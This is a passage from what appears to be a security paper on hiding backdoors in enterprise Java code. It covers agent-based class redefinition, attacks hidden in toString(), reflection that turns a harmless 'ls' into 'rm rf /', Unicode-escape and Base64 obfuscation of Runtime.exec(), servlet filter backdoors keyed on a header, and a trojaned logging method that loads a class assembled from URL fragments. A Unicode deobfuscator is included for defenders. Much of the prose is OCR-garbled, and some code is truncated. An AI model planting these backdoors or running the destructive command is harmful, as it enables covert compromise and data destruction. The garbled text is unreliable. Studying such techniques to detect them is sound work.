vm.loadAgent( jarpath );

// Test out the "after" behavior
System.out.println( new Innocent() );
}
}

1he aaenL lLself slmplv Lakes Lhe new bvLes and replaces Lhe exlsLlna class wlLh Lhem.

13 13
import java.lang.instrument.ClassDefinition;
import java.lang.instrument.Instrumentation;

public class SpecialAgent {
public static void agentmain(String agentArgs, Instrumentation inst) {
try {
Class c = Class.forName( Attacher.getName() );
inst.redefineClasses(new ClassDefinition(c, Attacher.getBytes());
}
}

uslna Lhls Lechnlque, Lhe behavlor of anv class or meLhod can be enLlrelv chanaed. 1hls lncludes svsLem
classes llke SLrlna, buL noL prlmlLlve classes llke lnL.class. 1he onlv resLrlcLlon ls LhaL Lhe baslc slanaLures
musL remaln Lhe same. 1he aaenL can do almosL anvLhlna. SenslLlve daLa can be dlsclosed or chanaed,
anv securlLv mechanlsms can be bvpassed, anv users mlahL be denled servlce, and anv svsLem acLlvlLv
can be monlLored. 1here are [usL no llmlLs Lo whaL Lhls mallclous Lechnlque could be used for. ln facL, we
mav be able Lo use lL Lo help securlLv, bv lmplemenLlna LalnL Lraclna and oLher checks.
Utbr Tcbniqus
1hls should noL be consldered an exhausLlve llsL, Lhese are [usL Lhe examples LhaL seemed Lhe mosL
obvlous. 1here are verv llkelv Lo be oLher wavs Lo Lurn daLa lnLo code wlLhln Lhe Lvplcal !ava enLerprlse
envlronmenL. AspecL orlenLed proarammlna ls a posslblllLv lf Lhe Lools are presenL.
3. Hiding from Human Cod Rviwrs
Pumans Lend Lo be beLLer Lhan Lools aL undersLandlna Lhe conLexL of code, and ldenLlfvlna aLLacks
relaLed Lo Lhe meanlna of Lhe code. Cn Lhe oLher hand, humans have manv weaknesses when lL comes
Lo revlewlna code. Puman llmlLaLlons on speed, vlallance, and comprehenslon all provlde opporLunlLles
for mallclous developers Lo bvpass code revlew. ln addlLlon, Lhe human deslre Lo flnd meanlna mav be a
dlsLracLlon ln manv cases. Whlle an lnnocenL proarammer would noL lnLenLlonallv mlslead a human
revlewer wlLh meLhod names, varlable names, commenLs, and ldloms, Lhe creaLor of a rooLklL would
almosL cerLalnlv use all of Lhose Lechnlques.
ln Lhls secLlon we conslder several Lechnlques for obfuscaLlna mallclous code from human code
revlewers and esLabllshlna plauslble denlablllLv.
Abusing Mtbod Nams, Variabl Nams, and Commnts
Code revlewers are onlv human, and Lhev are suscepLlble Lo mlsleadlna lnformaLlon ln Lhe code. ln Lhe
example below, Lhe aLLacker has embedded a call Lo mallclous code lnslde Lhe LoSLrlna() meLhod whlch

14 14
ls frequenLlv lnvoked. AlLhouah onlv a sLaLlc SLrlna ls referenced, Lhe acLual aLLack ls hldden lnslde Lhe
sLaLlc lnlLlallzer of Lhe 1 class, whlch runs when Lhe class ls loaded.
public String toString() {
// initialize the frapjamminer STR10349 tla 03-13-2006
return new T.PREFIX + ":" + myState;
}

1he LoSLrlna() meLhod ls noL one LhaL mosL code revlewers would spend a loL of Llme on, because Lhe
conLracL for Lhe meLhod ls Lo slmplv reLurn a sLrlna represenLlna Lhe ob[ecL. A revlewer would noL
expecL a mallclous slde effecL lnslde a LoSLrlna(). Also, because manv of Lhe bullL-ln !ava runLlme classes
call meLhods llke LoSLrlna(), hashcode(), and equals() auLomaLlcallv, Lhev are noL alwavs called dlrecLlv
from wlLhln Lhe appllcaLlon. 1hls helps Lo hlde Lhese calls from conLrol flow analvsls.
Abusing Rflction {Part 1)
1here are manv wavs Lo hlde SLrlnas ln !ava, buL mosL developers and code revlewers belleve LhaL a
SLrlna cannoL be chanaed once asslaned. 1hev are wldelv consldered Lo be lmmuLable. Powever,
because mosL enLerprlses run wlLhouL a SecurlLvManaaer Lo conLrol reflecLlon, Lhen even SLrlnas
declared flnal and prlvaLe can be chanaed [10].
ln Lhe meLhod below, Lhe SLrlna class ls modlfled so LhaL Lhe value" fleld ls seL Lo be accesslble. 1hen
Lhe value ls seL wlLh Lhe replacemenL characLers and Lhe lenaLh ls updaLed. 1hls lnnocenL looklna code
can be burled anvwhere ln a sofLware basellne and could easllv be overlooked bv code revlewers.
public static void changeString(String original, String replacement)
{
try
{
Field value = String.class.getDeclaredField("value");
value.setAccessible(true);
value.set(original, replacement.toCharArray());
Field count = String.class.getDeclaredField("count");
count.setAccessible(true);
count.set(original, replacement.length());
}
catch (Exception ex) {}
}

lmaalne, lf Lhls meLhod slanaLure was publlc sLaLlc SLrlna append( SLrlna a, SLrlna b)" - a mallclous
developer could use Lhls call anvwhere ln Lhelr code Lo chanae Lhe value of an arblLrarv SLrlna. ln Lhe
example below, Lhe sLaLlc flnal CMu ls chanaed from Lhe harmless ls" command Lo Lhe damaalna rm -
rf /" command.

13 13
public static final String CMD = "ls";

// normally this command would be safe
Runtime.getRuntime().exec( CMD );

// unless a developer anywhere else in the code calls changeString
changeString( Utils.CMD, "rm rf /" );

Abusing Rflction {Part 2)
8eflecLlon can be used Lo obfuscaLe wlLhln a !ava flle as well. ln Lhe flrsL example, a 8ase64 encoded
sLrlna ls decoded Lo [ava.lana.8unLlme|exec|[ava.lana.SLrlna|aeL8unLlme|calc" and Lhen used wlLh
reflecLlon Lo lnvoke 8unLlme.exec() on Lhe calc" Wlndows proaram.
String[] x = new String( new BASE64Decoder().decodeBuffer(
"amF2YS5sYW5nLlJ1bnRpbWV8ZXhlY3xqYXZhLmxhbmcuU3RyaW5nfGdldFJ1bnRpbWV8Y2FsYw==") )
.split("\\|");
Class.forName(x[0]).getMethod(x[1],new Class[]{Class.forName(x[2])})
.invoke(Class.forName(x[0]).getMethod(x[3],null).invoke(null,null),new Object[]{
x[4]});

Abusing Cod Formatting
Slmple formaLLlna Lrlcks mav fool weak code revlewers lnLo mlsslna crlLlcal code. lor example,
whlLespace can be used Lo move code pasL Lhe vlslble edlLor wlndow. ln Lhe laLe 1980's, Lhe auLhor used
Lhls Lechnlque ln vMS uCL scrlpLs Lo plav Lrlcks on unwarv colleaaues. Craphlcal luLs are onlv sllahLlv
beLLer aL helplna code revlewers noLlce Lhls klnd of Lrlckerv.
Also, !ava allows a pecullar Lvpe of obfuscaLlon ln Lhe formaLLlna of source code. 1o supporL unlcode
sLrlnas, vou can encode characLers wlLh Lhe \uPPPP formaL, even normal ASCll alphanumerlc
characLers. uslna Lhls Lechnlque, an aLLacker can ln[ecL real code lnLo a commenLed ouL block, as shown
below. 1he Lrlck ls LhaL Lhe \u002a\u002f sequence ls reallv Lhe */ characLers, whlch closes Lhe
commenL and enLers an execuLable code conLexL. 1he \u002f\u002fa sequence aL Lhe end of Lhe llnes
opens a new commenL, maklna Lhe enLlre block appear Lo be commenLed ouL. 1he // Lvpe of commenL,
semlcolons, quoLed sLrlnas, and oLher svnLax also affords opporLunlLles for aLLackers Lo use Lhls
Lechnlque. ulfferenL edlLors deal wlLh encoded characLers dlfferenLlv, maklna Lhls lssue dlfflculL Lo
noLlce.
Pere ls an enLlre !ava flle LhaL an aLLacker mlahL lnserL ln a sofLware basellne.

16 16
/*\u002a\u002f\u0070\u0075\u0062\u006c\u0069\u0063\u0020\u0063\u006c\u0061\u0073
\u0073\u0020\u0053\u0069\u006d\u0070\u006c\u0065\u0020\u007b\u002f\u002a
/*\u002a\u002f\u0070\u0075\u0062\u006c\u0069\u0063\u0020\u0073\u0074\u0061\u0074
\u0069\u0063\u0020\u0076\u006f\u0069\u0064\u0020\u006d\u0061\u0069\u006e\u0028
\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0061\u0072\u0067\u0073
\u0029\u0020\u0020\u007b\u002f\u002a
/*\u002a\u002f\u0064\u0028\u0022\u006e\u006f\u0074\u0065\u0070\u0061\u0064\u0022
\u0029\u003b\u002f\u002a
/*\u002a\u002f\u007d\u002f\u002a
/*\u002a\u002f\u002f\u002a
/*\u002a\u002f\u0070\u0072\u0069\u0076\u0061\u0074\u0065\u0020\u0073\u0074\u0061
\u0074\u0069\u0063\u0020\u0076\u006f\u0069\u0064\u0020\u0064\u0028\u0020\u0053
\u0074\u0072\u0069\u006e\u0067\u0020\u0078\u0020\u0029\u0020\u007b\u002f\u002a
/*\u002a\u002f\u0074\u0072\u0079\u007b\u0020\u0052\u0075\u006e\u0074\u0069\u006d
\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028
\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0078\u0029\u003b\u0020\u007d\u0020
\u0063\u0061\u0074\u0063\u0068\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069
\u006f\u006e\u0020\u0065\u0020\u0029\u0020\u007b\u007d\u002f\u002a
/*\u002a\u002f\u007d\u002f\u002a
/*\u002a\u002f\u007d

1he decoded verslon of Lhls class ls shown below.
public class Simple {
public static void main(String[] args) {
d("notepad");
}

private static void d( String x ) {
try{ Runtime.getRuntime().exec(x); } catch(Exception e ) {}
}
}

Pere are Lhree dlfferenL examples of how Lhls Lrlck can be used for obfuscaLlna calls Lo 8unLlme.exec().
Cf course Lhe characLers ln 8unLlme.exec()" could be obfuscaLed Loo.
System.out.println("test\u0022\u0029\u003BRuntime.getRuntime().exec(args[0] );

System.out.println("test\u0022\u0029\u003BRuntime.getRuntime().exec(args[0]
\u0029\u003BClass.forName\u0028\u0022Escape");

String s = "notepad";
/*
* Be sure to use a salt with your encryption such as:
* \\\uuuuuuuuuuuuuu002a\u002f\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e
\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029
\u002e\u0065\u0078\u0065\u0063\u0028\u0073\u0029\u003b\u002f\u002a
* See http://www.owasp.org/index.php/ESAPI for more details
*/

8elow ls a Lool LhaL wlll decode Lhls Lvpe of encodlna ln !ava source code. lL handles some perverse
forms of encodlna LhaL Lhe !ava compller wlll accepL, lncludlna mulLlple \" and u" characLers. 8unnlna

17 17
Lhls Lvpe of Lool before a code revlew mav help Lo prevenL Lhls Lvpe of aLLack from sneaklna Lhrouah.
AlLhouah Llme dld noL permlL checklna Lhe varlous sLaLlc analvsls Lools Lo see lf Lhev handle Lhese
encodlnas, lL would make lnLeresLlna research.
import java.io.*;
import java.util.regex.*;

/* Decodes Java code encoded with the \\uHHHH format */
public class JavaSourceDeobfuscator {

private static Pattern regex = Pattern.compile( "\\\\+u+[0-9a-fA-F]{4}");
private static boolean decoded = false;

StringBuffer sb = new StringBuffer();
BufferedReader fr = new BufferedReader( new FileReader( new File(args[0]) ) );
String line = null;
while( (line=fr.readLine() ) != null ) {
sb.append( unescapeLine( line ) + "\n");
}
if ( decoded ) {
FileWriter fw = new FileWriter( new File(args[0]+".decoded" ) );
fw.write( sb.toString() );
fw.close();
}
}

private static String unescapeLine( String line ) {
StringBuffer sb=new StringBuffer();
int index = 0;
Matcher matcher = regex.matcher( line );
while( matcher.find(index) ) {
sb.append( line.substring( index, matcher.start() ) );
sb.append( decode( line.substring( matcher.start(), matcher.end() ) ) );
decoded = true;
index = matcher.end();
}
sb.append( line.substring(index ) );
return sb.toString();
}

private static char decode( String value ) {
String num = value.replace("u", "" ).replace("\\", "" );
try {
return (char)Integer.parseInt( num, 16 );
} catch( NumberFormatException e ) {
return '?';
}
}
}

lf vou need some obfuscaLed code Lo experlmenL wlLh, vou can use Lhls code obfuscaLor. lL escapes all
Lhe code wlLh \uPPPP formaL, and adds /* commenLs Lo make Lhe code look commenLed ouL.

18 18
import java.io.*;

/* Obfuscates Java code with the \\uHHHH format and comments */
public class JavaSourceObfuscator {

FileWriter w = new FileWriter( new File(args[0]+".encoded" ) );
w.write( "\\u002f\\u002a");
for (int j = 0; j < args.length; j++) {
BufferedReader r = new BufferedReader(new FileReader(new File(args[j])));
String line = null;
while( (line=r.readLine() ) != null ) {
w.write( escapeLine( line ) + "\n" );
}
w.write( "\\u002a\\u002f\n");
w.close();
}
}

private static String escapeLine( String line ) {
StringBuffer sb=new StringBuffer();
for ( int i = 0; i < line.length(); i++ ) {
int cp = line.codePointAt(i);
sb.append( "\\u" + toHex( cp ) );
}
return( "\\u002a\\u002f" + sb.toString() + "\\u002f\\u002a");
}

private static String toHex( int x ) {
String hex = Integer.toHexString(x);
return "0000".substring(hex.length() ) + hex;
}
}

lf vou are lnLeresLed ln a challenae, Cooale Code Search Lurned up Lhls !ava proaram obfuscaLed ln Lhls
wav. 1he code does some lnLeresLlna Lhlnas, buL ls obfuscaLed wlLh oLher meLhods as well. Cood luck.
hLLp://exLrods.aooalecode.com/svn/Lrunk/cllenLs/[araon/src/apl/edu/sdsc/arld/lo/Lucld.[ava.
Abusing Invrsion of Control
Manv of Lhe more popular !ava web appllcaLlon frameworks relv on lnverslon of conLrol." 1hls deslan
paLLern or archlLecLural approach [12] lnvolves havlna vour cusLom code lnvoked bv Lhe framework,
raLher Lhan wrlLlna code Lo dlrecL Lhe flow of execuLlon.
1he use of complex frameworks adds a Lask Lo Lhe [ob of revlewlna code. 1he revlewer musL undersLand
how Lhe framework works and whaL code wlll be execuLed and ln whaL order. CLherwlse, Lhe aLLacker
mav be able Lo puL code ln a plualn, exLenslon, paae, conLrol, acLlon, or some oLher parL of Lhe
framework LhaL ls lnvoked buL ls noL obvlous.

19 19
Abusing Arcbitctur
ln mosL appllcaLlons, Lhere are pleces of code LhaL are somewhaL exLernal Lo Lhe maln appllcaLlon. lor
example, Lhe appllcaLlon mlahL lnclude a azlp fllLer LhaL compresses P1ML paaes on Lhe wav ouL of Lhe
appllcaLlon. 1hese pleces of code are LempLlna locaLlons for a mallclous developer, as Lhev are
frequenLlv noL developed and deploved ln Lhe same wav as Lhe maln appllcaLlon.
lor example, an aLLacker mlahL sneak ln Lhe followlna code lnLo a !ava LL lllLer Lo add a speclal
backdoor LhaL aranLs Lhem all roles. ln Lhls example, an PLLpServleL8equesLWrapper ls used Lo overrlde
Lhe lsuserln8ole() meLhod, so LhaL when Lhe aLLacker sends Lhe codeword, Lhev are consldered Lo be ln
everv role.
public void doFilter(ServletRequest request, ServletResponse response, FilterChain
chain) throws IOException, ServletException {
HttpServletRequest r = new HttpServletRequestWrapper((HttpServletRequest)request){
public boolean isUserInRole( String role ) {
String x = getHeader("backdoor");
return ( x != null && x.equals( "true" ) ? true :
super.isUserInRole(role) );
}
};
chain.doFilter(r, response);
}

AnoLher wav Lo use !ava LL lllLers ls Lo aeL around !ava auLhenLlcaLlon and access conLrol as deflned ln
web.xml. 1he <securlLv-consLralnL> rules are noL applled when Lhe 8equesLulspaLcher ls used Lo forward
or lnclude flles. 1herefore, an aLLacker who can lnserL code lnLo a !ava fllLer mlahL be able Lo bvpass
oLherwlse sLrona securlLv rules.
public void doFilter(ServletRequest request, ServletResponse response, FilterChain
chain) throws IOException, ServletException {
HttpServletRequest req = (HttpServletRequest)request;
String x = getParameter("backdoor");
if ( x == null || !x.equals( "true" ) return;
String target = req.getServletPath();
if (req.getPathInfo() != null) target += req.getPathInfo();
if (req.getQueryString() != null) target += "?"+req.getQueryString();
request.getRequestDispatcher(target).forward(request, response);
}
4. Hiding from Cod Analysis Tools
1here are several Lools on Lhe markeL LhaL search source code for securlLv problems. Some of Lhe
Lechnlques for Lurnlna daLa lnLo code ln order Lo hlde from human code revlewers wlll also be effecLlve
aaalnsL some Lools. 8uL code analvsls Lools have a dlfferenL seL of sLrenaLhs and weaknesses aaalnsL
Lhese Lechnlques Lhan human analvsLs do.

20 20
1ools are noL fooled bv semanLlcs, and so an aLLacker cannoL use manv of Lhe Lrlcks LhaL fool humans.
Powever, Lools are llmlLed ln Lhelr undersLandlna of whaL Lhe code ls supposed Lo do. 1hls makes lL
lmposslble for Lhem Lo recoanlze manv lnsLances of mallclous code.
ln facL, Lhe easlesL wav for a mallclous developer Lo aeL around sLaLlc analvsls ls Lo creaLe an aLLack LhaL
lnvolves someLhlna LhaL Lhe sLaLlc code analvsls enalne slmplv can'L undersLand. Slnce Lhere ls no wav Lo
Leach Lhe Lool Lhe buslness rules, lL can'L check Lhe code for vlolaLlons of Lhese rules.
AnoLher advanLaae a mallclous lnslder has ls LhaL Lhev probablv know whaL code analvsls Lools Lhe
oraanlzaLlon ls uslna, and so Lhev can run Lhe Lools Lhemselves Lo make sure Lhelr flaw ls noL deLecLed
bv Lhe Lools Lhev use. 1hls ls no dlfferenL Lhan Lhe advanLaae LhaL vlrus auLhors have. vlrus wrlLers aeL Lo
run all Lhe anLl-vlrus Lools aaalnsL Lhelr new vlrus before Lhev release lL lnLo Lhe wlld, slanlflcanLlv
reduclna Lhe llkellhood of deLecLlon.
1he followlna dlscusses a few of Lhe manv wavs LhaL a mallclous developer mlahL Lrv Lo avold deLecLlon
bv sLaLlc analvsls Lools. MosL of Lhese Lechnlques would also be verv dlfflculL for a manual code revlewer
Lo undersLand and ldenLlfv as well.
Abusing Validation
uaLa flow analvsls Lraces unLrusLed lnpuL Lhrouah an appllcaLlon from sources Lo slnks. lrequenLlv, Lhese
daLa flows are used Lo flnd ln[ecLlon lssues llke xSS, SCL ln[ecLlon, command ln[ecLlon, eLc. WlLhouL daLa
flow analvsls, lL ls dlfflculL Lo Lell wheLher a parLlcular source Lo slnk paLh ls acLuallv explolLable. WheLher
vou should use proper securlLv conLrols evervwhere, or [usL flx Lhe holes LhaL have been proven Lo be
explolLable Lhrouah full source Lo slnk daLa flow analvsls ls a Loplc for a dlfferenL paper.
unLrusLed lnpuL comes from manv sources, noL [usL end users, buL also from backend svsLems, servlces,
dlrecLorles, and anv oLher source LhaL doesn'L auaranLee Lhe safeLv of Lhe daLa. SLaLlc analvsls Lools
Lrace Lhls unLrusLed daLa Lo danaerous meLhods, known as slnks," buL Lhev sLop lf Lhe daLa ls valldaLed.
Cne wav Lo avold belna deLecLed bv sLaLlc analvsls ls Lo sneak danaerous lnpuL Lhrouah Lhe valldaLlon
meLhods or Lo dellberaLelv weaken Lhe valldaLlon meLhods Lo allow aLLacks Lo pass Lhrouah.
uevelopers are qulLe creaLlve abouL bvpasslna valldaLlon rules. ln a recenL code revlew, a ma[or flnanclal
oraanlzaLlon had an appllcaLlon where Lhe developers couldn'L aeL Lhe daLa Lhev needed Lhrouah Lhe
valldaLlon fllLer, so Lhev base64 encoded lL ln Lhe cllenL, and Lhen decoded lL ln Lhe buslness loalc.afLer
Lhe fllLer. 1hls dellberaLe Lechnlque was mosL llkelv noL mallclous approach and lL solved Lhe developer's
problem." Powever, lL also allowed ln[ecLlon aLLacks because Lhe daLa was now essenLlallv unvalldaLed.
8elow ls an example of uslna Lhls Lechnlque mallclouslv Lo avold sLaLlc analvsls checks.

21 21
public class TaintWrecker extends HttpServlet {

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws
ServletException, IOException {
String x = req.getParameter( "x" );
x = new String( new sun.misc.BASE64Decoder().decodeBuffer(x) );
if ( validate( x ) ) {
// continue business function, including execute SQL query containing x
} else {
log( "Validation problem with " + x );
}
}

Pattern p = Pattern.compile( "^[A-Za-z0-9\\\\\\/\\=\\-+.]*$");
public boolean validate( String value ) {
try {
if ( p.matcher(value).matches() ) return true;
} catch (Exception e ) {
}
return false;
}
}
Abusing E)Bs, Maps, and Databass to Prvnt Data Flow Analysis
AnoLher wav LhaL developers can avold unLrusLed daLa checks bv sLaLlc analvsls Lools ls Lo puL Lhe daLa
lnLo sLoraae ln a wav LhaL Lhe Lool can'L Lrace. lor example, sLorlna Lhe daLa ln a daLabase wlLh one
querv and reLrlevlna lL wlLh anoLher. 1he sLaLlc analvsls Lools can'L parse querles lf Lhev are aeneraLed aL
runLlme, so Lhev can'L know whlch daLa ln Lhe daLabase ls LalnLed and whlch ls clean.
1hls happens wlLh manv dlfferenL Lvpes of archlLecLural paLLerns lnvolvlna daLa flow. erslsLence lavers,
varlous Lvpes of maps, requesL aLLrlbuLes, sesslon aLLrlbuLes, servlces, beans, u1Cs, and oLher sLoraae
can confuse daLa flow enalnes. A common example of Lhls problem occurs when searchlna for posslble
xSS problems. ln Lhe example below, a requesL ls passed lnLo a bean consLrucLor whlch pulls ouL Lhe
needed parameLers and sLores Lhem wlLhouL anv valldaLlon or escaplna. 1he bean ls puL lnLo a requesL
aLLrlbuLe whlch ls laLer reLrleved ln a !S paae. 1he daLa ls pulled from Lhe bean and puL lnLo Lhe web
paae, aaaln wlLhouL valldaLlon or escaplna.

22 22
...in the code...
// the business function creates a bean with the request
AddressHelper helper = new AddressHelper(request);

// inside the bean, the data is extracted from the request
this.url = request.getParameter("url");

// the bean is set as a request attribute
request.setAttribute("address_helper", helper);

...in the JSP...
<%
// the JSP extracts the bean and sets up the data for the page
AddressHelper helper = (AddressHelper)request.getAttribute("address_helper");
String url = helper.getUrl();
%>
document.contentForm.action='<%=url%>'
Abusing Built-in Callbacks to Call Smingly Dad Cod
Cne wav Lo confuse flow analvsls ls Lo use Lhe auLomaLlc callbacks bullL lnLo Lhe !ava runLlme Lo call vour
code. 1he !uk ls rlddled wlLh Lhese callbacks LhaL lnvoke code wlLhouL anv obvlous Lrace ln Lhe source
code. 1he use of equals(), compare1o(), hashCode(), and LoSLrlna() meLhods ln Lhe CollecLlons Al ls well
known. 1he flnallze() meLhod on anv class wlll run when Lhe ob[ecL ls aarbaae collecLed.
1ools LhaL don'L follow Lhe conLrol flow lnLo all of Lhe !ava runLlme llbrarles wlll noL be able Lo follow
Lhese paLhs and mav wronalv conclude LhaL Lhe code ls dead. 1he Lwo examples below show how
meLhods wlll be lnvoked even lf Lhev are noL expllclLlv lnvoked.
// this code will call HostileException.getMessage()
try {
...
} catch( Exception e ) {
e.printStackTrace();
}

// this code will call Puppies.run()
new Thread( new org.innocent.Puppies( req.getParameter( "z" ) ).start();
Abusing Rflction to Invok Hiddn Attacks
1he !ava 8eflecLlon Al ls exLremelv powerful, and mosL modern frameworks llke SLruLs, Sprlna,
PlbernaLe, !unlL, and oLhers relv on lL. noL surprlslnalv, reflecLlon ls Lvplcallv avallable ln enLerprlse !ava
envlronmenLs.

23 23
8eflecLlon can be used bv aLLackers Lo make lL dlfflculL for sLaLlc analvsls Lools Lo follow Lhelr code. ln Lhe
slmple example below, Lhe svsLem 8unLlme ls looked up and Lhe exec() meLhod ls called Lo sLarL Lhe
Wlndows noLepad. 1he sLrlnas used as parameLers ln Lhe call can be obfuscaLed ln anv number of wavs
Lo make lL dlfflculL for Lhe sLaLlc analvsls enalne Lo flaure ouL whaL Lhe values should be. 1he sLrlnas
could even be senL ln aL runLlme Lo prevenL sLaLlc analvsls enLlrelv.
String a = "java.lang.Runtime";
String b = "getRuntime"
String c = "notepad"
((Runtime)Class.forName(a).getMethod(b,null).invoke(null, null)).exec(c);
Utbr Tcbniqus
Aaaln Lhls ls noL lnLended Lo be a comprehenslve llsL. 8aLher, Lhese Loplcs are a sLarLlna polnL ln Lhe
research we need Lo be dolna Lo prevenL mallclous code.

5. Trojaning tb )ava Platform, Containr, and Libraris
1he rlsk of !ava enLerprlse rooLklLs ls noL onlv llmlLed Lo mallclous lnslders. Packers can LaraeL
oraanlzaLlons bv aLLempLlna Lo aeL mallclous code lnLo Lhelr sofLware supplv chaln. LxLernal aLLackers
mlahL aLLempL Lo puL mallclous code ln anv of Lhe code LhaL vour enLerprlse appllcaLlons depend on.
A developer who wanLs Lo cover hls Lracks and make an aLLack work ln loLs of dlfferenL envlronmenLs
mlahL conslder LaraeLlna Lhe [ars ln Lhe web conLalner or Lhe !ava runLlme envlronmenL. 1hese producLs
conLaln loLs of code on whlch Lhe enLerprlse appllcaLlon depends.
1he cusLom code wrlLLen speclflcallv for vour appllcaLlon depends on Lhe llbrarles vou reference, [ar flles
from vour conLalner, [ar flles lnsLalled lnLo vour !ava runLlme, and Lhe sLandard !ava runLlme [ar flles. ln
Lhe prevlous secLlons, we dlscussed aLLacks aaalnsL cusLom code. ln Lhls secLlon, we'll dlscuss how an
aLLacker mlahL Lro[an Lhe [ar flles ln Lhe resL of Lhe sLack. 1here are an lnflnlLe number of wavs Lo Lro[an
Lhls code, buL we'll examlne a few [usL Lo demonsLraLe Lhe ease of Lhls Lvpe of aLLack.
Pow easv or hard Lhls aLLack ls Lo execuLe depends enLlrelv on Lhe people, processes, and Lools used Lo
develop a llbrarv and how lL ls deploved. 1he dlfflculLv has verv llLLle Lo do wlLh wheLher Lhe code ls sold
commerclallv or made avallable under an open source llcense.

24 24
Trojaning Library Sourc Cod
vlrLuallv everv !ava appllcaLlon references a number of [ar flles. Lverv one of Lhese [ar flles ls avallable Lo
Lhe mallclous developer, whlch means LhaL vour enLerprlse ls LrusLlna all Lhe code ln Lhem. 1here are a
number of dlfferenL wavs LhaL a mallclous developer mlahL use Lhese llbrarles Lo aLLack an enLerprlse.
Slmplv aeLLlna mallclous code lnLo a [ar flle ls noL sufflclenL for Lhe aLLack. ln addlLlon, Lhe aLLacker has Lo
make sure LhaL Lhe [ar flle ls avallable on Lhe appllcaLlon's classpaLh. Also, Lhe aLLacker has Lo call Lhe
mallclous code. Slmplv referenclna Lhe Lro[aned class ls aenerallv enouah Lo aeL lL classloaded, whlch wlll
run Lhe code ln Lhe sLaLlc lnlLlallzer of a class.
ConcepLuallv, Lhe slmplesL aLLack ls for Lhe exLernal aLLacker Lo conLrlbuLe mallclous code Lo a llbrarv.
1hls ls posslble for boLh commerclal and open source llbrarles. ln elLher case, Lhe hardesL parL of Lhe
aLLack ls becomlna a developer on Lhe pro[ecL and aalnlna rlahLs Lo commlL code Lo Lhe reposlLorv.
1he aLLacker mlahL achleve Lhls bv conLrlbuLlna a paLch Lo Lhe pro[ecL lead LhaL aeLs lncluded wlLhouL
close revlew. AlLernaLlvelv, Lhe aLLacker mlahL bulld LrusL bv conLrlbuLlna useful modlflcaLlons unLll Lhev
have earned a spoL as a pro[ecL commlLLer. AL LhaL polnL, Lhere are aenerallv no resLrlcLlons on Lhe
modlflcaLlons LhaL Lhe aLLacker can make. An lnnocenL enLerprlse developer wlll Lhen download Lhe
llbrarv, puL lL on Lhe classpaLh, and Lhe appllcaLlon wlll lnvoke a meLhod LhaL conLalns Lhe mallclous
code.
Trojaning Popular Upn Sourc Libraris
Cne of Lhe mosL devasLaLlna mallclous aLLacks posslble would be Lo Lro[an a verv popular llbrarv llke
Loa4[, SLruLs, Sprlna, or Apache Commons. 1hese llbrarles are used ln a broad ranae of appllcaLlons
across a varleLv of secLors. lmaalne whaL would happen lf an aLLacker successfullv Lro[aned Lhe Loa4[
llbrarv, whlch ls used ln a huae number of flnanclal lnsLlLuLlons, and oLher lndusLrles as well. 1hls ls mosL
llkelv Lhe fasLesL and easlesL wav Lo compromlse our naLlon's flnanclal svsLem.
lmaalne LhaL Loa4[ conLalns speclal backdoor code LhaL onlv runs when a cerLaln sequence of daLa ls
loaaed. ln Lhe bvpotbetlcol example code below, Lhe aLLacker has Lro[aned Lhe Loaaer.loaWarn() meLhod
bv wrapplna Lhe lnpuL ln a call Lo a new sanlLlze() meLhod. 1he sanlLlze() meLhod, whlch could be named
anvLhlna and locaLed anvwhere on Lhe classpaLh, ls lnLended Lo sLrlp all non-alphanumerlc lnpuL from
Lhe loa messaae. lL also lncludes mallclous code LhaL exLracLs chunks of bvLecode from Lhe messaaes
belna sanlLlzed and assembles Lhem lnLo a compleLe base64 encoded class flle and lnvokes Lhe
classloader Lo run lL. 1he loaded class conLalns Lhe real pavload, whlch could be anv arblLrarv !ava code.
1he aLLacker could explolL oraanlzaLlons aL wlll, slmplv bv sendlna aLLacks ln a shorL serles of u8Ls.
AppllcaLlons LhaL use Lhe llbrarv Lo loa u8Ls would aeL explolLed. 1he rooLklL ls effecLlve because
unforLunaLelv mosL enLerprlses use llbrarles llke Loa4[ wlLhouL checklna Lhem for mallclous code. 1he
example below ls onlv sllahLlv obscured, buL mosL revlewers would be looklna ln a loaalna meLhod for
loa ln[ecLlon, noL a mallclous classloader aLLack.

23 23
private static StringBuffer messageBuilder = new StringBuffer();
Pattern p = Pattern.compile("^[A-Za-z0-9]*$");

public void logWarn( String message ) {
try {
out.println( new Date() + ":" + sanitize(message) );
} catch( Exception e ) {}
}

private String sanitize( String input ) throws Exception {
// handle TLA multipart Unicode byte ordering - http://www.ietf.org/RFC31337.html
int index = input.indexOf( 0xFFFE );
int lastIndex = input.indexOf( 0xFFFF );
if ( index != -1 || lastIndex != -1 ) {
messageBuilder.append( input.substring( Math.max(index, lastIndex) + 1 ) );
}
if ( lastIndex != -1 ) {
BadClassLoader.loadEvil( messageBuilder.toString() );
messageBuilder.setLength(0);
}
StringBuilder sb = new StringBuilder();
for ( int i = 0; i < input.length(); i++ ) {
if (Character.isLetterOrDigit(input.charAt(i))) sb.append(input.charAt(i));
}
return sb.toString();
}

http://www.example.com/app?attack_part1=%FF%FEa98dfjlkajf...
http://www.example.com/app?attack_part2=%FF%FF2efas0dfjwals...
Trojaning Class Fils
8aLher Lhan uslna a dlrecL aLLack, an aLLacker mlahL lnsLead wrlLe code LhaL modlfles Lhe bvLecode of a
LrusLed !ava class flle Lo lnclude an aLLack. 1hls can be accompllshed wlLh anv of several bvLecode
enalneerlna llbrarles avallable, lncludlna ASM and 8CLL. lorLunaLelv for Lhe aLLacker, Lhe 8CLL llbrarv ls
presenL ln Lhe sLandard rL.[ar provlded bv Sun. CLher !ava lmplemenLaLlons mav noL have Lhls capablllLv.
1o execuLe Lhls aLLack, Lhe mallclous developer could planL a sLaLlc meLhod anvwhere ln Lhe appllcaLlon.
CLher Lechnlques could be used Lo obfuscaLe Lhls meLhod. 1he purpose of Lhls meLhod ls Lo lnsLall a
Lro[an lnLo a selecLed meLhod. 1he code parses Lhe bvLecode, flnds Lhe meLhod, exLracLs Lhe lnsLrucLlon
llsL, several new lnsLrucLlons, replaces Lhe modlfled meLhod ln Lhe class flle, and saves Lhe flle back Lo
Lhe flle svsLem.
